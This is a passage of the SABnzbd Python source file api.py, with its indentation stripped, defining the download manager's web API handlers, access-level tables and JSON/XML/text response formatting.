# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.api - api
"""
import os
import logging
import re
import gc
import datetime
import time
import json
import cherrypy
import locale
from threading import Thread
try:
import win32api
import win32file
except ImportError:
pass
import sabnzbd
from sabnzbd.constants import (
VALID_ARCHIVES,
VALID_NZB_FILES,
Status,
FORCE_PRIORITY,
NORMAL_PRIORITY,
INTERFACE_PRIORITIES,
KIBI,
MEBI,
GIGI,
)
import sabnzbd.config as config
import sabnzbd.cfg as cfg
from sabnzbd.skintext import SKIN_TEXT
from sabnzbd.utils.pathbrowser import folders_at_path
from sabnzbd.utils.getperformance import getcpu
from sabnzbd.misc import (
loadavg,
to_units,
int_conv,
time_format,
cat_convert,
create_https_certificates,
calc_age,
opts_to_pp,
)
from sabnzbd.filesystem import diskspace, get_ext, globber_full, clip_path, remove_all, userxbit
from sabnzbd.encoding import xml_name
from sabnzbd.utils.servertests import test_nntp_server_dict
from sabnzbd.getipaddress import localipv4, publicipv4, ipv6, addresslookup
from sabnzbd.database import build_history_info, unpack_history_info, HistoryDB
import sabnzbd.notifier
import sabnzbd.rss
import sabnzbd.emailer
import sabnzbd.sorting
##############################################################################
# API error messages
##############################################################################
_MSG_NO_VALUE = "expects one parameter"
_MSG_NO_VALUE2 = "expects two parameters"
_MSG_INT_VALUE = "expects integer value"
_MSG_NO_ITEM = "item does not exist"
_MSG_NOT_IMPLEMENTED = "not implemented"
_MSG_NO_FILE = "no file given"
_MSG_NO_PATH = "file does not exist"
_MSG_OUTPUT_FORMAT = "Format not supported"
_MSG_NO_SUCH_CONFIG = "Config item does not exist"
_MSG_CONFIG_LOCKED = "Configuration locked"
_MSG_BAD_SERVER_PARMS = "Incorrect server settings"
# For Windows: determine executable extensions
if os.name == "nt":
PATHEXT = os.environ.get("PATHEXT", "").lower().split(";")
else:
PATHEXT = []
def api_handler(kwargs):
""" API Dispatcher """
if cfg.api_logging():
# Was it proxy forwarded?
xff = cherrypy.request.headers.get("X-Forwarded-For")
if xff:
logging.debug(
"API-call from %s (X-Forwarded-For: %s) [%s] %s",
cherrypy.request.remote.ip,
xff,
cherrypy.request.headers.get("User-Agent", "??"),
kwargs,
)
else:
logging.debug(
"API-call from %s [%s] %s",
cherrypy.request.remote.ip,
cherrypy.request.headers.get("User-Agent", "??"),
kwargs,
)
# Clean-up the arguments
for vr in ("mode", "output", "name"):
if vr in kwargs and isinstance(kwargs[vr], list):
kwargs[vr] = kwargs[vr][0]
mode = kwargs.get("mode", "")
output = kwargs.get("output", "")
name = kwargs.get("name", "")
if mode not in ("version", "auth"):
msg = sabnzbd.interface.check_apikey(kwargs)
if msg:
return report(output, msg)
response = _api_table.get(mode, (_api_undefined, 2))[0](name, output, kwargs)
return response
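# A sketch of the dispatch structure api_handler() relies on (an assumption
# about its shape; _api_table itself is defined further down in this module):
# each API mode maps to a (handler, n) tuple, where the second element is
# assumed to be an access level, roughly
#
#     _api_table = {
#         "get_config": (_api_get_config, 2),
#         "queue": (_api_queue, 2),
#         "version": (_api_version, 2),
#         ...
#     }
#
# with _api_undefined used as the fallback for unknown modes, as shown above.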
def _api_get_config(name, output, kwargs):
""" API: accepts output, keyword, section """
_, data = config.get_dconfig(kwargs.get("section"), kwargs.get("keyword"))
return report(output, keyword="config", data=data)
def _api_set_config(name, output, kwargs):
""" API: accepts output, keyword, section """
if cfg.configlock():
return report(output, _MSG_CONFIG_LOCKED)
if kwargs.get("section") == "servers":
kwargs["keyword"] = handle_server_api(output, kwargs)
elif kwargs.get("section") == "rss":
kwargs["keyword"] = handle_rss_api(output, kwargs)
elif kwargs.get("section") == "categories":
kwargs["keyword"] = handle_cat_api(output, kwargs)
else:
res = config.set_config(kwargs)
if not res:
return report(output, _MSG_NO_SUCH_CONFIG)
config.save_config()
res, data = config.get_dconfig(kwargs.get("section"), kwargs.get("keyword"))
return report(output, keyword="config", data=data)
def _api_set_config_default(name, output, kwargs):
""" API: Reset requested config variables back to defaults. Currently only for misc-section """
if cfg.configlock():
return report(output, _MSG_CONFIG_LOCKED)
keywords = kwargs.get("keyword", [])
if not isinstance(keywords, list):
keywords = [keywords]
for keyword in keywords:
item = config.get_config("misc", keyword)
if item:
item.set(item.default())
config.save_config()
return report(output)
def _api_del_config(name, output, kwargs):
""" API: accepts output, keyword, section """
if cfg.configlock():
return report(output, _MSG_CONFIG_LOCKED)
if del_from_section(kwargs):
return report(output)
else:
return report(output, _MSG_NOT_IMPLEMENTED)
def _api_queue(name, output, kwargs):
""" API: Dispatcher for mode=queue """
value = kwargs.get("value", "")
return _api_queue_table.get(name, (_api_queue_default, 2))[0](output, value, kwargs)
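# _api_queue_table (also defined further down) is assumed to mirror _api_table:
# it maps the queue sub-command passed in `name` (e.g. "delete", "pause",
# "sort") to a (handler, access-level) tuple, with _api_queue_default as the
# fallback used above.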
def _api_queue_delete(output, value, kwargs):
""" API: accepts output, value """
if value.lower() == "all":
removed = sabnzbd.NzbQueue.remove_all(kwargs.get("search"))
return report(output, keyword="", data={"status": bool(removed), "nzo_ids": removed})
elif value:
items = value.split(",")
delete_all_data = int_conv(kwargs.get("del_files"))
removed = sabnzbd.NzbQueue.remove_multiple(items, delete_all_data=delete_all_data)
return report(output, keyword="", data={"status": bool(removed), "nzo_ids": removed})
else:
return report(output, _MSG_NO_VALUE)
def _api_queue_delete_nzf(output, value, kwargs):
""" API: accepts value(=nzo_id), value2(=nzf_id) """
value2 = kwargs.get("value2")
if value and value2:
removed = sabnzbd.NzbQueue.remove_nzf(value, value2, force_delete=True)
return report(output, keyword="", data={"status": bool(removed), "nzf_ids": removed})
else:
return report(output, _MSG_NO_VALUE2)
def _api_queue_rename(output, value, kwargs):
""" API: accepts output, value(=old name), value2(=new name), value3(=password) """
value2 = kwargs.get("value2")
value3 = kwargs.get("value3")
if value and value2:
ret = sabnzbd.NzbQueue.change_name(value, value2, value3)
return report(output, keyword="", data={"status": ret})
else:
return report(output, _MSG_NO_VALUE2)
def _api_queue_change_complete_action(output, value, kwargs):
""" API: accepts output, value(=action) """
sabnzbd.change_queue_complete_action(value)
return report(output)
def _api_queue_purge(output, value, kwargs):
""" API: accepts output """
removed = sabnzbd.NzbQueue.remove_all(kwargs.get("search"))
return report(output, keyword="", data={"status": bool(removed), "nzo_ids": removed})
def _api_queue_pause(output, value, kwargs):
""" API: accepts output, value(=list of nzo_id) """
if value:
items = value.split(",")
handled = sabnzbd.NzbQueue.pause_multiple_nzo(items)
else:
handled = False
return report(output, keyword="", data={"status": bool(handled), "nzo_ids": handled})
def _api_queue_resume(output, value, kwargs):
""" API: accepts output, value(=list of nzo_id) """
if value:
items = value.split(",")
handled = sabnzbd.NzbQueue.resume_multiple_nzo(items)
else:
handled = False
return report(output, keyword="", data={"status": bool(handled), "nzo_ids": handled})
def _api_queue_priority(output, value, kwargs):
""" API: accepts output, value(=nzo_id), value2(=priority) """
value2 = kwargs.get("value2")
if value and value2:
try:
try:
priority = int(value2)
except:
return report(output, _MSG_INT_VALUE)
pos = sabnzbd.NzbQueue.set_priority(value, priority)
            # Returns the new position in the queue; -1 means the job-id was incorrect
return report(output, keyword="position", data=pos)
except:
return report(output, _MSG_NO_VALUE2)
else:
return report(output, _MSG_NO_VALUE2)
def _api_queue_sort(output, value, kwargs):
""" API: accepts output, sort, dir """
sort = kwargs.get("sort")
direction = kwargs.get("dir", "")
if sort:
sabnzbd.NzbQueue.sort_queue(sort, direction)
return report(output)
else:
return report(output, _MSG_NO_VALUE2)
def _api_queue_default(output, value, kwargs):
""" API: accepts output, sort, dir, start, limit """
start = int_conv(kwargs.get("start"))
limit = int_conv(kwargs.get("limit"))
search = kwargs.get("search")
info, pnfo_list, bytespersec = build_queue(start=start, limit=limit, output=output, search=search)
return report(output, keyword="queue", data=info)
def _api_queue_rating(output, value, kwargs):
""" API: accepts output, value(=nzo_id), type, setting, detail """
vote_map = {"up": sabnzbd.Rating.VOTE_UP, "down": sabnzbd.Rating.VOTE_DOWN}
flag_map = {
"spam": sabnzbd.Rating.FLAG_SPAM,
"encrypted": sabnzbd.Rating.FLAG_ENCRYPTED,
"expired": sabnzbd.Rating.FLAG_EXPIRED,
"other": sabnzbd.Rating.FLAG_OTHER,
"comment": sabnzbd.Rating.FLAG_COMMENT,
}
content_type = kwargs.get("type")
setting = kwargs.get("setting")
if value:
try:
video = audio = vote = flag = None
if content_type == "video" and setting != "-":
video = setting
if content_type == "audio" and setting != "-":
audio = setting
if content_type == "vote":
vote = vote_map[setting]
if content_type == "flag":
flag = flag_map[setting]
if cfg.rating_enable():
sabnzbd.Rating.update_user_rating(value, video, audio, vote, flag, kwargs.get("detail"))
return report(output)
except:
return report(output, _MSG_BAD_SERVER_PARMS)
else:
return report(output, _MSG_NO_VALUE)
def _api_options(name, output, kwargs):
""" API: accepts output """
return options_list(output)
def _api_translate(name, output, kwargs):
""" API: accepts output, value(=acronym) """
return report(output, keyword="value", data=T(kwargs.get("value", "")))
def _api_addfile(name, output, kwargs):
""" API: accepts name, output, pp, script, cat, priority, nzbname """
# Normal upload will send the nzb in a kw arg called name or nzbfile
if not name or isinstance(name, str):
name = kwargs.get("nzbfile", None)
if hasattr(name, "file") and hasattr(name, "filename") and name.filename:
cat = kwargs.get("cat")
xcat = kwargs.get("xcat")
if not cat and xcat:
# Indexer category, so do mapping
cat = cat_convert(xcat)
# Add the NZB-file
res, nzo_ids = sabnzbd.add_nzbfile(
name,
pp=kwargs.get("pp"),
script=kwargs.get("script"),
cat=cat,
priority=kwargs.get("priority"),
nzbname=kwargs.get("nzbname"),
password=kwargs.get("password"),
)
return report(output, keyword="", data={"status": res == 0, "nzo_ids": nzo_ids})
else:
return report(output, _MSG_NO_VALUE)
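# Illustrative only (the URL layout and any field values are assumptions, not
# taken from this file): a client would typically reach this handler with a
# multipart POST along the lines of
#
#     POST /api?mode=addfile&apikey=<key>&cat=tv&output=json
#
# attaching the NZB as the "name" or "nzbfile" form field, which is what the
# hasattr() checks above look for.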
def _api_retry(name, output, kwargs):
""" API: accepts name, output, value(=nzo_id), nzbfile(=optional NZB), password (optional) """
value = kwargs.get("value")
# Normal upload will send the nzb in a kw arg called nzbfile
if name is None or isinstance(name, str):
name = kwargs.get("nzbfile")
password = kwargs.get("password")
password = password[0] if isinstance(password, list) else password
nzo_id = retry_job(value, name, password)
if nzo_id:
return report(output, keyword="", data={"status": True, "nzo_id": nzo_id})
else:
return report(output, _MSG_NO_ITEM)
def _api_cancel_pp(name, output, kwargs):
""" API: accepts name, output, value(=nzo_id) """
nzo_id = kwargs.get("value")
if sabnzbd.PostProcessor.cancel_pp(nzo_id):
return report(output, keyword="", data={"status": True, "nzo_id": nzo_id})
else:
return report(output, _MSG_NO_ITEM)
def _api_addlocalfile(name, output, kwargs):
""" API: accepts name, output, pp, script, cat, priority, nzbname """
if name:
if os.path.exists(name):
pp = kwargs.get("pp")
script = kwargs.get("script")
cat = kwargs.get("cat")
xcat = kwargs.get("xcat")
if not cat and xcat:
# Indexer category, so do mapping
cat = cat_convert(xcat)
priority = kwargs.get("priority")
nzbname = kwargs.get("nzbname")
password = kwargs.get("password")
if get_ext(name) in VALID_ARCHIVES + VALID_NZB_FILES:
res, nzo_ids = sabnzbd.add_nzbfile(
name,
pp=pp,
script=script,
cat=cat,
priority=priority,
keep=True,
nzbname=nzbname,
password=password,
)
return report(output, keyword="", data={"status": res == 0, "nzo_ids": nzo_ids})
else:
logging.info('API-call addlocalfile: "%s" is not a supported file', name)
return report(output, _MSG_NO_FILE)
else:
logging.info('API-call addlocalfile: file "%s" not found', name)
return report(output, _MSG_NO_PATH)
else:
logging.info("API-call addlocalfile: no file name given")
return report(output, _MSG_NO_VALUE)
def _api_switch(name, output, kwargs):
""" API: accepts output, value(=first id), value2(=second id) """
value = kwargs.get("value")
value2 = kwargs.get("value2")
if value and value2:
pos, prio = sabnzbd.NzbQueue.switch(value, value2)
# Returns the new position and new priority (if different)
return report(output, keyword="result", data={"position": pos, "priority": prio})
else:
return report(output, _MSG_NO_VALUE2)
def _api_change_cat(name, output, kwargs):
""" API: accepts output, value(=nzo_id), value2(=category) """
value = kwargs.get("value")
value2 = kwargs.get("value2")
if value and value2:
nzo_id = value
cat = value2
if cat == "None":
cat = None
result = sabnzbd.NzbQueue.change_cat(nzo_id, cat)
return report(output, keyword="status", data=bool(result > 0))
else:
return report(output, _MSG_NO_VALUE)
def _api_change_script(name, output, kwargs):
""" API: accepts output, value(=nzo_id), value2(=script) """
value = kwargs.get("value")
value2 = kwargs.get("value2")
if value and value2:
nzo_id = value
script = value2
if script.lower() == "none":
script = None
result = sabnzbd.NzbQueue.change_script(nzo_id, script)
return report(output, keyword="status", data=bool(result > 0))
else:
return report(output, _MSG_NO_VALUE)
def _api_change_opts(name, output, kwargs):
""" API: accepts output, value(=nzo_id), value2(=pp) """
value = kwargs.get("value")
value2 = kwargs.get("value2")
result = 0
if value and value2 and value2.isdigit():
result = sabnzbd.NzbQueue.change_opts(value, int(value2))
return report(output, keyword="status", data=bool(result > 0))
def _api_fullstatus(name, output, kwargs):
""" API: full history status"""
status = build_status(skip_dashboard=kwargs.get("skip_dashboard", 1), output=output)
return report(output, keyword="status", data=status)
def _api_history(name, output, kwargs):
""" API: accepts output, value(=nzo_id), start, limit, search """
value = kwargs.get("value", "")
start = int_conv(kwargs.get("start"))
limit = int_conv(kwargs.get("limit"))
last_history_update = int_conv(kwargs.get("last_history_update", 0))
search = kwargs.get("search")
failed_only = int_conv(kwargs.get("failed_only"))
categories = kwargs.get("category")
# Do we need to send anything?
if last_history_update == sabnzbd.LAST_HISTORY_UPDATE:
return report(output, keyword="history", data=False)
if categories and not isinstance(categories, list):
categories = [categories]
if not limit:
limit = cfg.history_limit()
if name == "delete":
special = value.lower()
del_files = bool(int_conv(kwargs.get("del_files")))
if special in ("all", "failed", "completed"):
history_db = sabnzbd.get_db_connection()
if special in ("all", "failed"):
if del_files:
del_job_files(history_db.get_failed_paths(search))
history_db.remove_failed(search)
if special in ("all", "completed"):
history_db.remove_completed(search)
sabnzbd.history_updated()
return report(output)
elif value:
jobs = value.split(",")
for job in jobs:
del_hist_job(job, del_files)
sabnzbd.history_updated()
return report(output)
else:
return report(output, _MSG_NO_VALUE)
elif not name:
history = {}
grand, month, week, day = sabnzbd.BPSMeter.get_sums()
history["total_size"], history["month_size"], history["week_size"], history["day_size"] = (
to_units(grand),
to_units(month),
to_units(week),
to_units(day),
)
history["slots"], fetched_items, history["noofslots"] = build_history(
start=start, limit=limit, search=search, failed_only=failed_only, categories=categories
)
history["last_history_update"] = sabnzbd.LAST_HISTORY_UPDATE
history["version"] = sabnzbd.__version__
return report(output, keyword="history", data=history)
else:
return report(output, _MSG_NOT_IMPLEMENTED)
def _api_get_files(name, output, kwargs):
""" API: accepts output, value(=nzo_id) """
value = kwargs.get("value")
if value:
return report(output, keyword="files", data=build_file_list(value))
else:
return report(output, _MSG_NO_VALUE)
def _api_addurl(name, output, kwargs):
""" API: accepts name, output, pp, script, cat, priority, nzbname """
pp = kwargs.get("pp")
script = kwargs.get("script")
cat = kwargs.get("cat")
priority = kwargs.get("priority")
nzbname = kwargs.get("nzbname", "")
password = kwargs.get("password", "")
if name:
nzo_id = sabnzbd.add_url(name, pp, script, cat, priority, nzbname, password)
# Reporting a list of NZO's, for compatibility with other add-methods
return report(output, keyword="", data={"status": True, "nzo_ids": [nzo_id]})
else:
logging.info("API-call addurl: no URLs recieved")
return report(output, _MSG_NO_VALUE)
def _api_pause(name, output, kwargs):
""" API: accepts output """
sabnzbd.Scheduler.plan_resume(0)
sabnzbd.Downloader.pause()
return report(output)
def _api_resume(name, output, kwargs):
""" API: accepts output """
sabnzbd.Scheduler.plan_resume(0)
sabnzbd.unpause_all()
return report(output)
def _api_shutdown(name, output, kwargs):
""" API: accepts output """
sabnzbd.shutdown_program()
return report(output)
def _api_warnings(name, output, kwargs):
""" API: accepts name, output """
if name == "clear":
return report(output, keyword="warnings", data=sabnzbd.GUIHANDLER.clear())
elif name == "show":
return report(output, keyword="warnings", data=sabnzbd.GUIHANDLER.content())
elif name:
return report(output, _MSG_NOT_IMPLEMENTED)
return report(output, keyword="warnings", data=sabnzbd.GUIHANDLER.content())
def _api_get_cats(name, output, kwargs):
""" API: accepts output """
return report(output, keyword="categories", data=list_cats(False))
def _api_get_scripts(name, output, kwargs):
""" API: accepts output """
return report(output, keyword="scripts", data=list_scripts())
def _api_version(name, output, kwargs):
""" API: accepts output """
return report(output, keyword="version", data=sabnzbd.__version__)
def _api_auth(name, output, kwargs):
""" API: accepts output """
auth = "None"
if not cfg.disable_key():
auth = "badkey"
key = kwargs.get("key", "")
if not key:
auth = "apikey"
else:
if key == cfg.nzb_key():
auth = "nzbkey"
if key == cfg.api_key():
auth = "apikey"
elif cfg.username() and cfg.password():
auth = "login"
return report(output, keyword="auth", data=auth)
def _api_restart(name, output, kwargs):
""" API: accepts output """
logging.info("Restart requested by API")
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={"timeout": 1}).start()
return report(output)
def _api_restart_repair(name, output, kwargs):
""" API: accepts output """
logging.info("Queue repair requested by API")
sabnzbd.request_repair()
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={"timeout": 1}).start()
return report(output)
def _api_disconnect(name, output, kwargs):
""" API: accepts output """
sabnzbd.Downloader.disconnect()
return report(output)
def _api_osx_icon(name, output, kwargs):
""" API: accepts output, value """
value = kwargs.get("value", "1").strip()
cfg.osx_menu.set(value != "0")
return report(output)
def _api_rescan(name, output, kwargs):
""" API: accepts output """
sabnzbd.NzbQueue.scan_jobs(all_jobs=False, action=True)
return report(output)
def _api_eval_sort(name, output, kwargs):
""" API: evaluate sorting expression """
name = kwargs.get("name", "")
value = kwargs.get("value", "")
title = kwargs.get("title")
multipart = kwargs.get("movieextra", "")
path = sabnzbd.sorting.eval_sort(value, title, name, multipart)
if path is None:
return report(output, _MSG_NOT_IMPLEMENTED)
else:
return report(output, keyword="result", data=path)
def _api_watched_now(name, output, kwargs):
""" API: accepts output """
sabnzbd.DirScanner.scan()
return report(output)
def _api_resume_pp(name, output, kwargs):
""" API: accepts output """
sabnzbd.PostProcessor.paused = False
return report(output)
def _api_pause_pp(name, output, kwargs):
""" API: accepts output """
sabnzbd.PostProcessor.paused = True
return report(output)
def _api_rss_now(name, output, kwargs):
""" API: accepts output """
# Run RSS scan async, because it can take a long time
sabnzbd.Scheduler.force_rss()
return report(output)
def _api_retry_all(name, output, kwargs):
""" API: Retry all failed items in History """
return report(output, keyword="status", data=retry_all_jobs())
def _api_reset_quota(name, output, kwargs):
""" Reset quota left """
sabnzbd.BPSMeter.reset_quota(force=True)
return report(output)
def _api_test_email(name, output, kwargs):
""" API: send a test email, return result """
logging.info("Sending test email")
pack = {"download": ["action 1", "action 2"], "unpack": ["action 1", "action 2"]}
res = sabnzbd.emailer.endjob(
"I had a d\xe8ja vu",
"unknown",
True,
os.path.normpath(os.path.join(cfg.complete_dir.get_path(), "/unknown/I had a d\xe8ja vu")),
123 * MEBI,
None,
pack,
"my_script",
"Line 1\nLine 2\nLine 3\nd\xe8ja vu\n",
0,
test=kwargs,
)
if res == T("Email succeeded"):
return report(output)
return report(output, error=res)
def _api_test_windows(name, output, kwargs):
""" API: send a test to Windows, return result """
logging.info("Sending test notification")
res = sabnzbd.notifier.send_windows("SABnzbd", T("Test Notification"), "other")
return report(output, error=res)
def _api_test_notif(name, output, kwargs):
""" API: send a test to Notification Center, return result """
logging.info("Sending test notification")
res = sabnzbd.notifier.send_notification_center("SABnzbd", T("Test Notification"), "other")
return report(output, error=res)
def _api_test_osd(name, output, kwargs):
""" API: send a test OSD notification, return result """
logging.info("Sending OSD notification")
res = sabnzbd.notifier.send_notify_osd("SABnzbd", T("Test Notification"))
return report(output, error=res)
def _api_test_prowl(name, output, kwargs):
""" API: send a test Prowl notification, return result """
logging.info("Sending Prowl notification")
res = sabnzbd.notifier.send_prowl("SABnzbd", T("Test Notification"), "other", force=True, test=kwargs)
return report(output, error=res)
def _api_test_pushover(name, output, kwargs):
""" API: send a test Pushover notification, return result """
logging.info("Sending Pushover notification")
res = sabnzbd.notifier.send_pushover("SABnzbd", T("Test Notification"), "other", force=True, test=kwargs)
return report(output, error=res)
def _api_test_pushbullet(name, output, kwargs):
""" API: send a test Pushbullet notification, return result """
logging.info("Sending Pushbullet notification")
res = sabnzbd.notifier.send_pushbullet("SABnzbd", T("Test Notification"), "other", force=True, test=kwargs)
return report(output, error=res)
def _api_test_nscript(name, output, kwargs):
""" API: execute a test notification script, return result """
logging.info("Executing notification script")
res = sabnzbd.notifier.send_nscript("SABnzbd", T("Test Notification"), "other", force=True, test=kwargs)
return report(output, error=res)
def _api_undefined(name, output, kwargs):
""" API: accepts output """
return report(output, _MSG_NOT_IMPLEMENTED)
def _api_browse(name, output, kwargs):
""" Return tree of local path """
compact = kwargs.get("compact")
if compact and compact == "1":
name = kwargs.get("term", "")
paths = [entry["path"] for entry in folders_at_path(os.path.dirname(name)) if "path" in entry]
return report(output, keyword="", data=paths)
else:
show_hidden = kwargs.get("show_hidden_folders")
paths = folders_at_path(name, True, show_hidden)
return report(output, keyword="paths", data=paths)
def _api_config(name, output, kwargs):
""" API: Dispatcher for "config" """
if cfg.configlock():
return report(output, _MSG_CONFIG_LOCKED)
return _api_config_table.get(name, (_api_config_undefined, 2))[0](output, kwargs)
def _api_config_speedlimit(output, kwargs):
""" API: accepts output, value(=speed) """
value = kwargs.get("value")
if not value:
value = "0"
sabnzbd.Downloader.limit_speed(value)
return report(output)
def _api_config_get_speedlimit(output, kwargs):
""" API: accepts output """
return report(output, keyword="speedlimit", data=sabnzbd.Downloader.get_limit())
def _api_config_set_colorscheme(output, kwargs):
""" API: accepts output"""
value = kwargs.get("value")
if value:
cfg.web_color.set(value)
return report(output)
else:
return report(output, _MSG_NO_VALUE)
def _api_config_set_pause(output, kwargs):
""" API: accepts output, value(=pause interval) """
value = kwargs.get("value")
sabnzbd.Scheduler.plan_resume(int_conv(value))
return report(output)
def _api_config_set_apikey(output, kwargs):
""" API: accepts output """
cfg.api_key.set(config.create_api_key())
config.save_config()
return report(output, keyword="apikey", data=cfg.api_key())
def _api_config_set_nzbkey(output, kwargs):
""" API: accepts output """
cfg.nzb_key.set(config.create_api_key())
config.save_config()
return report(output, keyword="nzbkey", data=cfg.nzb_key())
def _api_config_regenerate_certs(output, kwargs):
# Make sure we only over-write default locations
result = False
if (
sabnzbd.cfg.https_cert() is sabnzbd.cfg.https_cert.default()
and sabnzbd.cfg.https_key() is sabnzbd.cfg.https_key.default()
):
https_cert = sabnzbd.cfg.https_cert.get_path()
https_key = sabnzbd.cfg.https_key.get_path()
result = create_https_certificates(https_cert, https_key)
sabnzbd.RESTART_REQ = True
return report(output, data=result)
def _api_config_test_server(output, kwargs):
""" API: accepts output, server-params """
result, msg = test_nntp_server_dict(kwargs)
response = {"result": result, "message": msg}
if output:
return report(output, data=response)
else:
return msg
def _api_config_undefined(output, kwargs):
""" API: accepts output """
return report(output, _MSG_NOT_IMPLEMENTED)
def _api_server_stats(name, output, kwargs):
""" API: accepts output """
sum_t, sum_m, sum_w, sum_d = sabnzbd.BPSMeter.get_sums()
stats = {"total": sum_t, "month": sum_m, "week": sum_w, "day": sum_d, "servers": {}}
for svr in config.get_servers():
t, m, w, d, daily = sabnzbd.BPSMeter.amounts(svr)
stats["servers"][svr] = {"total": t or 0, "month": m or 0, "week": w or 0, "day": d or 0, "daily": daily or {}}
return report(output, keyword="", data=stats)
def _api_gc_stats(name, output, kwargs):
"""Function only intended for internal testing of the memory handling"""
# Collect before we check
gc.collect()
# We cannot create any lists/dicts, as they would create a reference
return report(output, data=[str(obj) for obj in gc.get_objects() if isinstance(obj, sabnzbd.nzbstuff.TryList)])
##############################################################################
_api_table = {
"server_stats": (_api_server_stats, 2),
"get_config": (_api_get_config, 3),
"set_config": (_api_set_config, 3),
"set_config_default": (_api_set_config_default, 3),
"del_config": (_api_del_config, 3),
"queue": (_api_queue, 2),
"options": (_api_options, 2),
"translate": (_api_translate, 2),
"addfile": (_api_addfile, 1),
"retry": (_api_retry, 2),
"cancel_pp": (_api_cancel_pp, 2),
"addlocalfile": (_api_addlocalfile, 1),
"switch": (_api_switch, 2),
"change_cat": (_api_change_cat, 2),
"change_script": (_api_change_script, 2),
"change_opts": (_api_change_opts, 2),
"fullstatus": (_api_fullstatus, 2),
"history": (_api_history, 2),
"get_files": (_api_get_files, 2),
"addurl": (_api_addurl, 1),
"addid": (_api_addurl, 1),
"pause": (_api_pause, 2),
"resume": (_api_resume, 2),
"shutdown": (_api_shutdown, 3),
"warnings": (_api_warnings, 2),
"config": (_api_config, 2),
"get_cats": (_api_get_cats, 2),
"get_scripts": (_api_get_scripts, 2),
"version": (_api_version, 1),
"auth": (_api_auth, 1),
"restart": (_api_restart, 3),
"restart_repair": (_api_restart_repair, 2),
"disconnect": (_api_disconnect, 2),
"osx_icon": (_api_osx_icon, 3),
"gc_stats": (_api_gc_stats, 3),
"rescan": (_api_rescan, 2),
"eval_sort": (_api_eval_sort, 2),
"watched_now": (_api_watched_now, 2),
"resume_pp": (_api_resume_pp, 2),
"pause_pp": (_api_pause_pp, 2),
"rss_now": (_api_rss_now, 2),
"browse": (_api_browse, 2),
"retry_all": (_api_retry_all, 2),
"reset_quota": (_api_reset_quota, 2),
"test_email": (_api_test_email, 2),
"test_windows": (_api_test_windows, 2),
"test_notif": (_api_test_notif, 2),
"test_osd": (_api_test_osd, 2),
"test_pushover": (_api_test_pushover, 2),
"test_pushbullet": (_api_test_pushbullet, 2),
"test_prowl": (_api_test_prowl, 2),
"test_nscript": (_api_test_nscript, 2),
}
_api_queue_table = {
"delete": (_api_queue_delete, 2),
"delete_nzf": (_api_queue_delete_nzf, 2),
"rename": (_api_queue_rename, 2),
"change_complete_action": (_api_queue_change_complete_action, 2),
"purge": (_api_queue_purge, 2),
"pause": (_api_queue_pause, 2),
"resume": (_api_queue_resume, 2),
"priority": (_api_queue_priority, 2),
"sort": (_api_queue_sort, 2),
"rating": (_api_queue_rating, 2),
}
_api_config_table = {
"speedlimit": (_api_config_speedlimit, 2),
"set_speedlimit": (_api_config_speedlimit, 2),
"get_speedlimit": (_api_config_get_speedlimit, 2),
"set_colorscheme": (_api_config_set_colorscheme, 2),
"set_pause": (_api_config_set_pause, 2),
"set_apikey": (_api_config_set_apikey, 3),
"set_nzbkey": (_api_config_set_nzbkey, 3),
"regenerate_certs": (_api_config_regenerate_certs, 3),
"test_server": (_api_config_test_server, 2),
}
def api_level(cmd, name):
""" Return access level required for this API call """
if cmd in _api_table:
return _api_table[cmd][1]
if name == "queue" and cmd in _api_queue_table:
return _api_queue_table[cmd][1]
if name == "config" and cmd in _api_config_table:
return _api_config_table[cmd][1]
return 4
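# Worked example, using only entries from the tables above: api_level("shutdown", "") returns 3,
# api_level("priority", "queue") returns 2 (via _api_queue_table), and any unknown command falls back to 4.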
def report(output, error=None, keyword="value", data=None):
"""Report message in json, xml or plain text
    If error is set, only a status/error report is made.
If no error and no data, only a status report is made.
Else, a data report is made (optional 'keyword' for outer XML section).
"""
if output == "json":
content = "application/json;charset=UTF-8"
if error:
info = {"status": False, "error": error}
elif data is None:
info = {"status": True}
else:
if hasattr(data, "__iter__") and not keyword:
info = data
else:
info = {keyword: data}
response = json.dumps(info).encode("utf-8")
elif output == "xml":
if not keyword:
# xml always needs an outer keyword, even when json doesn't
keyword = "result"
content = "text/xml"
xmlmaker = xml_factory()
if error:
status_str = xmlmaker.run("result", {"status": False, "error": error})
elif data is None:
status_str = xmlmaker.run("result", {"status": True})
else:
status_str = xmlmaker.run(keyword, data)
response = '<?xml version="1.0" encoding="UTF-8" ?>\n%s\n' % status_str
else:
content = "text/plain"
if error:
response = "error: %s\n" % error
elif not data:
response = "ok\n"
else:
response = "%s\n" % str(data)
cherrypy.response.headers["Content-Type"] = content
cherrypy.response.headers["Pragma"] = "no-cache"
return response
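# Rough sketch (illustrative values, not captured output) of the three report() output modes:
#   report("json", keyword="version", data="3.2.0") -> b'{"version": "3.2.0"}' (bytes, via json.dumps)
#   report("xml", keyword="version", data="3.2.0")  -> '<?xml ... ?>\n<version>3.2.0</version>\n\n'
#   report("text", data="3.2.0")                    -> '3.2.0\n'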
class xml_factory:
"""Recursive xml string maker. Feed it a mixed tuple/dict/item object and will output into an xml string
Current limitations:
In Two tiered lists hard-coded name of "item": <cat_list><item> </item></cat_list>
In Three tiered lists hard-coded name of "slot": <tier1><slot><tier2> </tier2></slot></tier1>
"""
def __init__(self):
self.__text = ""
def _tuple(self, keyw, lst):
text = []
for item in lst:
text.append(self.run(keyw, item))
return "".join(text)
def _dict(self, keyw, lst):
text = []
for key in lst.keys():
text.append(self.run(key, lst[key]))
if keyw:
return "<%s>%s</%s>\n" % (keyw, "".join(text), keyw)
else:
return ""
def _list(self, keyw, lst):
text = []
for cat in lst:
if isinstance(cat, dict):
text.append(self._dict(plural_to_single(keyw, "slot"), cat))
elif isinstance(cat, list):
text.append(self._list(plural_to_single(keyw, "list"), cat))
elif isinstance(cat, tuple):
text.append(self._tuple(plural_to_single(keyw, "tuple"), cat))
else:
if not isinstance(cat, str):
cat = str(cat)
name = plural_to_single(keyw, "item")
text.append("<%s>%s</%s>\n" % (name, xml_name(cat), name))
if keyw:
return "<%s>%s</%s>\n" % (keyw, "".join(text), keyw)
else:
return ""
def run(self, keyw, lst):
if isinstance(lst, dict):
text = self._dict(keyw, lst)
elif isinstance(lst, list):
text = self._list(keyw, lst)
